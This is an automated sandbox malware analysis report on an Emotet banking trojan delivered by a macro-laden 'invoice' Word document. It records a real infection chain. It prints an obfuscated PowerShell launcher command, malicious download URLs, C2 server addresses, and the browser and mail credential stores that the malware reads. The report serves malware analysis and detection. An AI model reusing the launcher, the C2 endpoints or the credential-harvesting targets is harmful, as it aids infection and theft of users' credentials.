
Analysis Report

Overview

General Information

Joe Sandbox Version: 20.0.0
Analysis ID: 389575
Start time: 21:52:21
Joe Sandbox Product: Cloud
Start date: 17.10.2017
Overall analysis duration: 0h 14m 32s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: urldownload.jbs
Sample URL: austinfilmschool.org/Invoice-Dated-17-Oct-17-372510608/VR-AOFGB/2017/
Analysis system description: Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • VBA Instrumentation enabled
  • JavaScript Instrumentation enabled
Detection: MAL
Classification: mal100.evad.spre.phis.spyw.troj.win@28/12@66/47
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
EGA Information: Failed
Warnings:
  • Exclude process from analysis (whitelisted): conhost.exe, WMIADAP.exe, dllhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryDirectoryFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE


Detection

Strategy | Score | Range | Reporting | Detection
Threshold | 100 | 0 - 100 | Report FP / FN | malicious


Confidence

Strategy | Score | Range | Further Analysis Required? | Confidence
Threshold | 5 | 0 - 5 | false |


Classification

Analysis Advice

Sample HTTP requests are all non-existing; the sample is likely no longer working.
Uses HTTPS for network communication; use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis.



Signature Overview



Spam, unwanted Advertisements and Ransom Demands:

Send many emails (e-Mail Spam)
Source: SMTP | Network traffic detected: Mail traffic on many different IPs 17

E-Banking Fraud:

Emotet Banking Trojan found
Source: unknown | Process created: C:\Windows\System32\helphome.exe 'C:\Windows\system32\helphome.exe' /scomma 'C:\ProgramData\C5E2.tmp'
Source: unknown | Process created: C:\Windows\System32\helphome.exe 'C:\Windows\system32\helphome.exe' /scomma 'C:\ProgramData\C5E1.tmp'
Source: C:\Windows\System32\helphome.exe | Process created: C:\Windows\System32\helphome.exe 'C:\Windows\system32\helphome.exe' /scomma 'C:\ProgramData\C5E2.tmp'
Source: C:\Windows\System32\helphome.exe | Process created: C:\Windows\System32\helphome.exe 'C:\Windows\system32\helphome.exe' /scomma 'C:\ProgramData\C5E1.tmp'

Networking:

Downloads files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected:
  GET /Invoice-Dated-17-Oct-17-372510608/VR-AOFGB/2017/ HTTP/1.0
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
  Accept: */*
  Host: austinfilmschool.org
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /nwbBJRnf/ HTTP/1.1
  Host: zlc-aa.org
  Connection: Keep-Alive
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: austinfilmschool.org
Posts data to webserver
Source: unknownHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.196.73.150:443Content-Length: 340Connection: Keep-AliveCache-Control: no-cacheData Raw: 23 26 83 00 fd 7e f3 5a e7 77 74 e7 92 19 0a 44 14 b3 5e bf 9a b8 0f a8 71 5f 02 bd 78 63 62 c0 38 96 8e 02 2b 17 ea cb 53 89 3c 23 d7 ec 91 9a 97 14 59 eb 1e 5c d9 93 6e f1 fc 4d b3 36 6f 58 6c e1 ad 52 1d f0 15 7a 8a f5 a2 b4 46 d7 2c 8a 04 05 07 6a f6 68 85 ff e4 90 e8 ce 7c 0e 3b 0c 3f f7 ac 28 1b 78 c8 2a 6d f2 b5 32 d8 9a d0 5e 3a 58 9c 1a 45 ba 23 b2 e2 05 ef 9c 76 c2 92 c9 33 92 b3 47 cc 44 08 5a c3 a2 3a 26 50 a4 f7 a1 ab e7 03 3a 36 2f 6f 8a 95 b4 50 0e d1 af 9c 3c 22 da 28 f1 f5 9a f3 ae d8 64 99 e0 29 92 81 38 0c 21 02 8f 80 e3 ff 5d f4 ed 1e b0 ab e5 62 fd 5b 18 94 a4 15 8c e3 f6 d9 5c 80 a9 96 8e 35 58 bd e0 95 42 a6 ab b3 91 93 40 ac 8e a6 23 06 21 1d 6e a1 a8 43 42 37 26 fd d1 5c 1b e9 06 4f 21
Tries to download non-existing http data (HTTP/1.1 404 Not Found)
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 17 Oct 2017 19:54:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 60868Connection: keep-aliveData Raw: 3b c1 24 4a ab 01 67 69 96 04 db 98 58 ae d2 75 4c 64 5c d7 4a ab b2 d5 ea c7 22 8f 4d 8a 91 c6 10 84 ba c2 97 c2 f4 0e 34 d8 2c bb 74 33 dc 72 f8 d8 d1 bb 96 4e fa 2f ce 21 f2 9e 3f 94 01 f3 66 88 db d6 c3 bb b9 e1 01 f0 ec 36 02 eb 7b ba a8 3f 29 e6 f2 25 5a 01 81 cf 57 fa cd 90 07 56 f9 b4 bb e0 96 58 26 aa 67 f1 9c 38 df 8d 38 68 60 e5 d4 d2 a9 e3 f7 98 9b 77 0f e2 78 d6 57 b2 ec 26 08 e6 c5 cb 51 ee c4 ac 55 85 95 08 16 78 88 6a c2 8a dc 7c 4c 58 18 47 5d 5d 49 09 d8 14 52 46 4d 96 87 cd 00 3a f2 98 eb 87 1f 15 c0 c9 6a 7c d6 d8 ae fa 9a f9 01 6c d3 f9 c7 f3 b4 d3 87 3f 09 77 b7 3e 20 dc eb ac 1a 50 22 c7 39 3b fc c2 53 55 06 5e 21 1c 3d 88 cd bd 58 fe e7 88 64 ab 87 8f d5 07 d3 40 b6 77 3c e0 17 86 57 24 93 bf a4 22 ce 3d fa 63 b1 32 32 d8 46 cd 02 45 e1 20 29 e0 98 ec 76 f3 74 71 fc bd 09 91 15 31 ca e5 59 90 fd fe db 0b eb 52 cd f2
Urls found in memory or binary data
Source: WINWORD.EXE | String found in binary or memory: file:///
Source: WINWORD.EXE | String found in binary or memory: file:///c:
Source: WINWORD.EXE | String found in binary or memory: file:///c:/users/user/desktop/download/client-%209650
Source: WINWORD.EXE | String found in binary or memory: http://
Source: wget.exe | String found in binary or memory: http://austinfilmschool.org/invoice-dated-17-oct-17-372510608/vr-aofgb/2017/
Source: wget.exe | String found in binary or memory: http://austinfilmschool.org/invoice-dated-17-oct-17-372510608/vr-aofgb/2017/8x
Source: WINWORD.EXE | String found in binary or memory: http://n
Source: WINWORD.EXE | String found in binary or memory: http://ns
Source: WINWORD.EXE | String found in binary or memory: http://ns.a
Source: WINWORD.EXE | String found in binary or memory: http://ns.~/
Source: WINWORD.EXE | String found in binary or memory: http://p
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49192
Source: unknown | Network traffic detected: HTTP traffic on port 49194 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49193 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49192 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49194
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49193
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49195
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49266
Source: unknown | Network traffic detected: HTTP traffic on port 49266 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49195 -> 443
Connects to many different domains
Source: unknown | Network traffic detected: DNS query count 45
Connects to several IPs in different countries
Source: unknown | Network traffic detected: IP country count 11
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected:
  GET /nwbBJRnf/ HTTP/1.1
  Host: zlc-aa.org
  Connection: Keep-Alive
Uses SMTP (mail sending)
Source: global traffic | TCP traffic: 192.168.1.16:49204 -> 40.101.48.82:587
Source: global traffic | TCP traffic: 192.168.1.16:49211 -> 217.119.50.35:587
Source: global traffic | TCP traffic: 192.168.1.16:49213 -> 212.77.101.1:587
Source: global traffic | TCP traffic: 192.168.1.16:49214 -> 213.186.33.20:587
Source: global traffic | TCP traffic: 192.168.1.16:49215 -> 195.78.67.24:587
Source: global traffic | TCP traffic: 192.168.1.16:49219 -> 195.4.92.211:587
Source: global traffic | TCP traffic: 192.168.1.16:49224 -> 81.169.145.164:587
Source: global traffic | TCP traffic: 192.168.1.16:49227 -> 85.13.152.217:587
Source: global traffic | TCP traffic: 192.168.1.16:49230 -> 91.198.169.21:587
Source: global traffic | TCP traffic: 192.168.1.16:49232 -> 85.13.134.71:587
Source: global traffic | TCP traffic: 192.168.1.16:49233 -> 213.186.33.155:587
Source: global traffic | TCP traffic: 192.168.1.16:49235 -> 195.250.38.66:587
Source: global traffic | TCP traffic: 192.168.1.16:49238 -> 213.90.36.9:587
Source: global traffic | TCP traffic: 192.168.1.16:49240 -> 64.29.151.235:587
Source: global traffic | TCP traffic: 192.168.1.16:49241 -> 37.9.169.18:587
Source: global traffic | TCP traffic: 192.168.1.16:49248 -> 213.145.228.17:587
Source: global traffic | TCP traffic: 192.168.1.16:49252 -> 74.125.205.108:587
Source: global traffic | TCP traffic: 192.168.1.16:49261 -> 81.19.149.200:587
Source: global traffic | TCP traffic: 192.168.1.16:49262 -> 212.33.55.20:587
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected:
  HEAD /Invoice-Dated-17-Oct-17-372510608/VR-AOFGB/2017/ HTTP/1.0
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
  Accept: */*
  Host: austinfilmschool.org
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /Invoice-Dated-17-Oct-17-372510608/VR-AOFGB/2017/ HTTP/1.0
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
  Accept: */*
  Host: austinfilmschool.org
  Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.196.73.150:443Content-Length: 340Connection: Keep-AliveCache-Control: no-cacheData Raw: 23 26 83 00 fd 7e f3 5a e7 77 74 e7 92 19 0a 44 14 b3 5e bf 9a b8 0f a8 71 5f 02 bd 78 63 62 c0 38 96 8e 02 2b 17 ea cb 53 89 3c 23 d7 ec 91 9a 97 14 59 eb 1e 5c d9 93 6e f1 fc 4d b3 36 6f 58 6c e1 ad 52 1d f0 15 7a 8a f5 a2 b4 46 d7 2c 8a 04 05 07 6a f6 68 85 ff e4 90 e8 ce 7c 0e 3b 0c 3f f7 ac 28 1b 78 c8 2a 6d f2 b5 32 d8 9a d0 5e 3a 58 9c 1a 45 ba 23 b2 e2 05 ef 9c 76 c2 92 c9 33 92 b3 47 cc 44 08 5a c3 a2 3a 26 50 a4 f7 a1 ab e7 03 3a 36 2f 6f 8a 95 b4 50 0e d1 af 9c 3c 22 da 28 f1 f5 9a f3 ae d8 64 99 e0 29 92 81 38 0c 21 02 8f 80 e3 ff 5d f4 ed 1e b0 ab e5 62 fd 5b 18 94 a4 15 8c e3 f6 d9 5c 80 a9 96 8e 35 58 bd e0 95 42 a6 ab b3 91 93 40 ac 8e a6 23 06 21 1d 6e a1 a8 43 42 37 26 fd d1 5c 1b e9 06 4f 21
Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.196.73.150:443Content-Length: 340Connection: Keep-AliveCache-Control: no-cacheData Raw: 70 b5 e8 a1 54 a2 6e 8e 94 c5 a1 23 a5 f6 79 af c8 70 04 51 3f ea 22 fa e5 0c 66 69 fd 7a 99 8b 69 34 47 de 96 e8 9e c7 df 5f 8c e8 01 28 3e 36 5d 8e f5 4a a2 6a 2f 05 91 8f 96 f1 81 82 e1 95 56 8d b8 47 17 8d 18 b3 80 b3 73 f9 4f df 00 bc b4 6b 17 88 9c b1 0e 20 b0 4d f6 48 62 d3 21 20 ed aa b7 7f 01 0a 09 63 ec 30 6a 5e 46 7b 0c c8 2c fd a1 b5 bd 6e b8 36 ea 12 c6 e8 8c a4 da 0d 49 aa c6 f0 f2 fb 49 ef 71 26 07 60 b2 51 92 3b e8 e2 ad b7 97 55 b7 fa 08 a0 f9 c8 aa 1c 5c 78 76 b4 fd f8 85 1d ce 4d b6 a0 a1 e0 6b 91 36 1b 6b 01 82 fb f5 f8 7c 59 26 fa 67 a3 cb 5b 58 1c 17 e4 f1 56 f4 ae ba 60 cc 62 a8 b8 92 4f ed b9 cc 57 8c 9c 56 dc 06 cd 79 2e f2 19 e0 bf df 51 cd 95 09 ed 1e cc 46 9f ca 13 39 70 b1 48 e9 aa
Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 93.180.157.92:443Content-Length: 164Connection: Keep-AliveCache-Control: no-cacheData Raw: 0d 14 aa 49 9c a1 77 0e a3 4b 37 7c 36 7f 3a 41 f1 6b 58 a1 21 b5 1e ed 34 70 cc 85 66 e1 99 76 a4 9c d2 72 fa db c2 6b 7b 42 4a 91 79 9d 6c a6 f9 f7 82 23 97 85 08 47 98 43 28 18 9f 6a e1 cd 2d e7 a4 1d d5 ed 0b 98 ea 0f e6 99 5b 70 d5 00 24 13 75 72 08 b9 17 96 62 bc a7 1b 3f 2b 4c 7d 56 8f 3c d5 8f 45 84 19 24 6e 32 cd a0 2f 31 47 17 9a 9c b2 f0 54 10 f8 2f 58 de a5 de 1e 48 2b 7e ce 44 6d ee 82 8b 56 18 90 d5 d2 66 a8 34 41 f4 f2 ce 23 70 32 5b dd 85 0c 2b 40 c3 cf 51 73 9e 89 da 8b Data Ascii: IwK7|6:AkX!4pfvrk{BJyl#GC(j-[p$urb?+L}V<E$n2/1GT/XH+~DmVf4A#p2[+@Qs
Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.196.73.150:443Content-Length: 356Connection: Keep-AliveCache-Control: no-cacheData Raw: 4b 2d d6 f1 04 31 52 42 f6 ee 81 3b a0 93 ff c0 ba d0 b7 3c 16 98 bb 28 2e 56 8c 67 22 45 47 dc 71 b4 2e da 98 33 e6 91 4b e8 08 f8 1d c1 aa 28 88 6d 1b f3 9b 59 5f e0 09 e8 90 d2 f5 2a 71 c6 1d e1 5b ad ae 31 0b fc 32 14 ad 19 29 58 5e 41 15 10 de 2f 04 15 ca df 1e 94 c8 d5 07 13 7d e8 69 73 83 e6 d8 d9 7e 0a c7 f0 2c 3c e1 ec 45 ed 8a ca 40 35 87 f4 23 97 ec 81 63 80 4c 10 37 83 72 4e 1a 36 71 db 6e 3c 71 86 40 b1 f1 49 a1 8c b5 93 bb 67 67 f8 db de bb bc 21 04 62 47 99 3d 06 e0 03 01 c8 2c 38 9a f9 8a f7 a9 60 c8 65 cd 74 8e b9 07 1a 2b 07 4d 5b 0e 53 4f 4e 57 69 31 d9 86 71 3c 00 45 58 10 e1 24 fc b7 a5 32 69 ce c9 9b 6f a4 09 02 fd b2 6e c4 56 67 0a 0c 81 45 32 8f ab ae 79 dc 8f 37 0d 56 f9 00 bb 33 28 e5
Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 93.180.157.92:443Content-Length: 612Connection: Keep-AliveCache-Control: no-cacheData Raw: 76 63 1d fb 03 17 f9 68 e3 c3 ed 9a de da 6c c8 6b b3 12 0d d5 15 e3 c0 9e a0 db a2 59 13 10 41 32 ca b3 ee e9 4b 47 41 3f e4 fa a7 aa f1 87 bf ae e7 d7 fc b2 e6 4d d6 c3 e5 84 d9 ce 77 91 0f 59 de b4 63 1a 2c d6 9d f5 55 4e e3 45 80 8c 0a ba 4e 97 7c 8d fa 6a 4a 14 49 a7 a8 5f e9 9b e3 03 31 77 75 8b 30 f0 a1 96 1c f0 6c 4a 58 2a c9 19 9e 0a 3a 6e 70 c0 bb 24 5c c0 9c 21 da c1 1a 79 ad ec 83 5f b3 e6 8c 1e 26 93 8a 3e 60 40 c2 e8 76 1e 07 83 45 36 94 3e 54 fc 0e bf 80 eb 94 d4 2d 27 1c 3b 4d e6 a7 9c 7f c1 41 ae 32 36 eb 8d b1 1d ed 9d 86 cc 91 fa 8e 5d 7a 19 35 eb 3e f4 12 b6 f9 44 70 cd 31 95 b6 f5 c3 7a 29 fc 52 ba 68 54 af d0 a2 f8 67 1a 68 30 99 79 3d 8f e6 5d 75 89 fe 49 5c 1a ec 80 a6 d2 cf b5 61 be 9
Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.1.16:49202 -> 173.201.192.101:3535
Source: global traffic | TCP traffic: 192.168.1.16:49204 -> 40.101.48.82:587
Source: global traffic | TCP traffic: 192.168.1.16:49211 -> 217.119.50.35:587
Source: global traffic | TCP traffic: 192.168.1.16:49213 -> 212.77.101.1:587
Source: global traffic | TCP traffic: 192.168.1.16:49214 -> 213.186.33.20:587
Source: global traffic | TCP traffic: 192.168.1.16:49215 -> 195.78.67.24:587
Source: global traffic | TCP traffic: 192.168.1.16:49219 -> 195.4.92.211:587
Source: global traffic | TCP traffic: 192.168.1.16:49224 -> 81.169.145.164:587
Source: global traffic | TCP traffic: 192.168.1.16:49227 -> 85.13.152.217:587
Source: global traffic | TCP traffic: 192.168.1.16:49230 -> 91.198.169.21:587
Source: global traffic | TCP traffic: 192.168.1.16:49232 -> 85.13.134.71:587
Source: global traffic | TCP traffic: 192.168.1.16:49233 -> 213.186.33.155:587
Source: global traffic | TCP traffic: 192.168.1.16:49235 -> 195.250.38.66:587
Source: global traffic | TCP traffic: 192.168.1.16:49238 -> 213.90.36.9:587
Source: global traffic | TCP traffic: 192.168.1.16:49240 -> 64.29.151.235:587
Source: global traffic | TCP traffic: 192.168.1.16:49241 -> 37.9.169.18:587
Source: global traffic | TCP traffic: 192.168.1.16:49248 -> 213.145.228.17:587
Source: global traffic | TCP traffic: 192.168.1.16:49252 -> 74.125.205.108:587
Source: global traffic | TCP traffic: 192.168.1.16:49261 -> 81.19.149.200:587
Source: global traffic | TCP traffic: 192.168.1.16:49262 -> 212.33.55.20:587
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2011124 ET MALWARE Suspicious FTP 220 Banner on Local Port (spaced) 173.201.192.101:3535 -> 192.168.1.16:49202

Stealing of Sensitive Information:

Searches for Windows Mail specific files
Source: C:\Windows\System32\helphome.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
Source: C:\Windows\System32\helphome.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Windows\System32\helphome.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
Source: C:\Windows\System32\helphome.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Windows\System32\helphome.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup unknown
Source: C:\Windows\System32\helphome.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Windows\System32\helphome.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new unknown
Source: C:\Windows\System32\helphome.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery *
Source: C:\Windows\System32\helphome.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery unknown
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\System32\helphome.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\secmod.db
Source: C:\Windows\System32\helphome.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\secmod.db
Source: C:\Windows\System32\helphome.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\places.sqlite
Source: C:\Windows\System32\helphome.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\helphome.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cert8.db
Source: C:\Windows\System32\helphome.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cert7.db
Source: C:\Windows\System32\helphome.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\key3.db
Source: C:\Windows\System32\helphome.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert8.db
Source: C:\Windows\System32\helphome.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Tries to steal Instant Messenger accounts or passwords
Source: C:\Windows\System32\helphome.exe | Key opened: HKEY_USERS\Software\Google\Google Talk\Accounts
Tries to steal Mail credentials (via file access)
Source: C:\Windows\System32\helphome.exe | Key opened: HKEY_USERS\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\System32\helphome.exe | Key opened: HKEY_USERS\Identities\{7E3C98C2-A457-4C7B-90BC-6B7522D9BDED}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\System32\helphome.exe | Key opened: HKEY_USERS\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\System32\helphome.exe | Key opened: HKEY_USERS\Software\IncrediMail\Identities
Source: C:\Windows\System32\helphome.exe | Key opened: HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities
Source: C:\Windows\System32\helphome.exe | Key opened: HKEY_USERS\Software\Microsoft\Windows Live Mail

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\16994.exe
Source: C:\Windows\System32\helphome.exe | File created: C:\Windows\System32\LLocMy8gfC0E0xG3.exe
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\System32\helphome.exe | File created: C:\Windows\System32\LLocMy8gfC0E0xG3.exe
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\System32\LLocMy8gfC0E0xG3.exe | Executable created and started: C:\Windows\system32\LLocMy8gfC0E0xG3.exe
Source: C:\Windows\System32\helphome.exe | Executable created and started: C:\Windows\System32\helphome.exe

Data Obfuscation:

PE file contains sections with non-standard names
Source: 16994.exe.7.dr | Static PE information: section name: f
Source: LLocMy8gfC0E0xG3.exe.11.dr | Static PE information: section name: f
Document contains an embedded VBA with many randomly named variables
Source: Client- 9650, Oct 2017 Invoice.doc.0.dr | Stream path 'Macros/VBA/Module1': High entropy of concatenated variable names
Obfuscated command line found
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /V /C 'set %GhHTTCPpd%=p^owe^rs&&set %VzCLIMdnL%=he^ll&&!%GhHTTCPpd%!!%VzCLIMdnL%! -e IABJAEUAWAAgACgAKAAoADMANgAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkAIAAsACAAMQAxADQALAAgADEAMAA1ACwAIAAxADEAMgAgACwAMQAxADYALAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACAALAAgADEAMAAxACwAIAAxADEAOQAgACwANAA1ACAALAAgADEAMQAxACwAIAA5ADgALAAxADAANgAsADEAMAAxACwAOQA5ACwAIAAxADEANgAgACwAIAAzADIALAA0ADUALAA2ADcALAAxADEAMQAsACAAMQAwADkAIAAsADcAOQAgACwAOQA4ACAALAAgADEAMAA2ACwAIAAxADAAMQAgACwAIAA5ADkALAAgADEAMQA2ACwAMwAyACAALAAgADgANwAsADgAMwAsACAAOQA5ACwAMQAxADQAIAAsACAAMQAwADUALAAgADEAMQAyACAALAAgADEAMQA2ACAALAA0ADYALAAgADgAMwAsADEAMAA0ACwAMQAwADEAIAAsADEAMAA4ACwAIAAxADAAOAAsADUAOQAgACwAIAAzADYALAAgADEAMQA5ACAALAAxADAAMQAsACAAOQA4ACAALAA5ADkAIAAsADEAMAA4ACwAMQAwADUALAAgADEAMAAxACAALAAxADEAMAAsADEAMQA2ACwAIAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACwAIAAxADAAMQAsACAAMQAxADkALAAgADQANQAgACwAIAAxADEAMQAgACwAOQA4ACAALAAxADAANgAgACwAIAAxADAAMQAgACwAOQA5ACAALAAxADEANgAsADMAMgAgACwAOAAzACAALAAxADIAMQAsADEAMQA
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe cmd /V /C 'set %GhHTTCPpd%=p^owe^rs&&set %VzCLIMdnL%=he^ll&&!%GhHTTCPpd%!!%VzCLIMdnL%! -e IABJAEUAWAAgACgAKAAoADMANgAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkAIAAsACAAMQAxADQALAAgADEAMAA1ACwAIAAxADEAMgAgACwAMQAxADYALAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACAALAAgADEAMAAxACwAIAAxADEAOQAgACwANAA1ACAALAAgADEAMQAxACwAIAA5ADgALAAxADAANgAsADEAMAAxACwAOQA5ACwAIAAxADEANgAgACwAIAAzADIALAA0ADUALAA2ADcALAAxADEAMQAsACAAMQAwADkAIAAsADcAOQAgACwAOQA4ACAALAAgADEAMAA2ACwAIAAxADAAMQAgACwAIAA5ADkALAAgADEAMQA2ACwAMwAyACAALAAgADgANwAsADgAMwAsACAAOQA5ACwAMQAxADQAIAAsACAAMQAwADUALAAgADEAMQAyACAALAAgADEAMQA2ACAALAA0ADYALAAgADgAMwAsADEAMAA0ACwAMQAwADEAIAAsADEAMAA4ACwAIAAxADAAOAAsADUAOQAgACwAIAAzADYALAAgADEAMQA5ACAALAAxADAAMQAsACAAOQA4ACAALAA5ADkAIAAsADEAMAA4ACwAMQAwADUALAAgADEAMAAxACAALAAxADEAMAAsADEAMQA2ACwAIAAzADIALAAgADYAMQAgACwAIAAzADIALAAgADEAMQAwACwAIAAxADAAMQAsACAAMQAxADkALAAgADQANQAgACwAIAAxADEAMQAgACwAOQA4ACAALAAxADAANgAgACwAIAAxADAAMQAgACwAOQA5ACAALAAxADEANgAsADMAMgAgACwAOAAzACAALAAxADIAMQAsADEAMQA

Spreading:

Creates COM task schedule object (often to register a task for autostart)
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
